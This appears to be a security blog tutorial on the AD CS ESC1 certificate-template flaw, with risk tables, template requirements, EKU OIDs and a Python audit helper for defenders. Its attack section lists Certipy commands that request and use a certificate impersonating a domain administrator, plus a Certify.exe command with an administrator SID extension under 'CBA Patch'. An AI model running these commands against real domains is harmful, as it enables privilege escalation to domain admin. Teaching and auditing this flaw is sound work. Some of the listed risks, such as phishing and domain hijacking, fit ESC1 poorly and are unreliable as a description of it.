ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability


What is the Subject Alternative Name (SAN)?

The Arbitrary Subject Alternative Name (SAN) vulnerability is a security concern related to the X.509 certificate standard used by the Transport Layer Security (TLS) protocol and by Active Directory certificate-based authentication.

The Subject Alternative Name field in a certificate allows multiple hostnames to be associated with a single public key.

Table of Contents

  1. What is the Subject Alternative Name (SAN)?
  2. AD CS ESC1 – Security Risks
  3. ESC1 Requirements
  4. Attacking Arbitrary Subject Alternative Name - ESC1
  5. CBA Patch
  6. Conclusion

This is particularly useful in scenarios where a server may have multiple domain names or subdomains.


AD CS ESC1 – Security Risks

Active Directory Certificate Services (AD CS) is crucial for providing public key infrastructure (PKI) functionalities, but it harbors security risks.

Significant among these is the escalation of privileges through misconfigurations, allowing attackers to issue fraudulent certificates or impersonate users.

Additionally, the complexity and maintenance requirements of AD CS make it vulnerable to emerging threats if not properly monitored and updated.

Security Risk: Description

Man-in-the-Middle Attacks: Attackers can exploit the vulnerability to intercept and modify communication between users and the affected server, compromising the confidentiality and integrity of the transmitted data.

Phishing Attacks: Malicious actors may use a certificate with an arbitrary SAN to impersonate a legitimate website, tricking users into providing sensitive information, leading to potential data breaches or fraud.

Domain Hijacking: By manipulating the SAN field, attackers might attempt to take control of a domain or subdomain associated with the certificate, posing a threat to the availability and integrity of online services.

Unauthorized Access: An exploited SAN vulnerability can potentially lead to unauthorized access to sensitive systems or information, compromising the overall security posture of the affected network or infrastructure.

ESC1 Requirements

Requirement: Description

ENROLLEE_SUPPLIES_SUBJECT: the template lets the requester specify the subject and SAN in the certificate request instead of building them from Active Directory.

Manual approvals disabled: CA certificate manager approval is not required, so the certificate is issued as soon as it is requested.

Authorization signatures: the template does not require any authorized signatures on the request.

Enrollment Rights: low-privileged users, or a group they belong to, are granted enrollment rights on the template.

List of necessary EKUs

EKU: OID

Client Authentication: 1.3.6.1.5.5.7.3.2

PKINIT Client Authentication: 1.3.6.1.5.2.3.4

Smart Card Logon: 1.3.6.1.4.1.311.20.2.2

Any Purpose: 2.5.29.37.0

No EKU: none defined (for example, the SubCA template)
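As an added example (not code from the original post), a small audit helper that checks a certificate template's Active Directory attributes against the requirements and EKU list above, so that a defender can flag templates to remediate. The attribute names and flag bits are the ones AD CS stores on template objects; the two template records and the low-privilege group set are constructed samples.

```python
# Added audit helper, not code from the original post. It evaluates whether a
# certificate template's AD attributes meet every ESC1 condition listed above.
# Attribute names and flag bits are those AD CS stores on template objects;
# the template records at the bottom are constructed samples.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)

# EKUs from the table above that make an issued certificate usable for AD logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


def esc1_conditions(template, low_priv_principals):
    """Return the ESC1 conditions a template satisfies (all five = ESC1)."""
    met = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("ENROLLEE_SUPPLIES_SUBJECT")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        met.append("manager approval disabled")
    if template["msPKI-RA-Signature"] == 0:
        met.append("no authorized signatures required")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # no EKU at all also allows authentication
        met.append("authentication EKU")
    if low_priv_principals & set(template["enroll"]):
        met.append("low-privileged enrollment rights")
    return met


def is_esc1(template, low_priv_principals):
    return len(esc1_conditions(template, low_priv_principals)) == 5


# Constructed sample: a copy of the built-in User template that was edited to
# let the enrollee supply the subject, followed by the same template hardened.
LOW_PRIV = {"Domain Users", "Authenticated Users"}
VULN_USER = {
    "msPKI-Certificate-Name-Flag": 0x1,  # enrollee supplies subject
    "msPKI-Enrollment-Flag": 0x29,       # approval bit (0x2) not set
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
    "enroll": ["Domain Users"],
}
# Hardened: subject is built from AD (flag cleared) and CA manager approval is on.
HARDENED_USER = dict(VULN_USER, **{"msPKI-Certificate-Name-Flag": 0x82000000,
                                   "msPKI-Enrollment-Flag": 0x2B})
```

Either change alone (clearing ENROLLEE_SUPPLIES_SUBJECT or requiring manager approval) breaks the ESC1 chain; the helper reports which conditions still hold so the remaining exposure is visible.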

Attacking Arbitrary Subject Alternative Name - ESC1

1. Find a Valid Template

certipy find -u [email protected] -p Passw0rd -dc-ip 192.168.160.5


2. Request Certificate as Administrator

certipy req -username [email protected] -password Passw0rd -ca corp-DC-CA -target ca.ad-attacks.local -template User -upn administrator@ad-attacks.local -dns dc.ad-attacks.local

3. Connect using the new Administrator Certificate

certipy auth -pfx Administrator.pfx -dc-ip 192.168.160.5

CBA Patch

Certify.exe request /ca:cbp-dc.protectedcb.corp\CBP-CA /template:ProtectedUserAccess /altname:administrator /sidextension:S-1-5-21-1286082170-882298176-404569034-500 /domain:protectedcb.corp

Conclusion

The Arbitrary SAN Vulnerability poses a substantial risk to encrypted communications, potentially allowing attackers to bypass encryption safeguards.

By understanding, detecting, and preventing this vulnerability, organizations can better protect their data integrity and confidentiality in the face of evolving cyber threats.
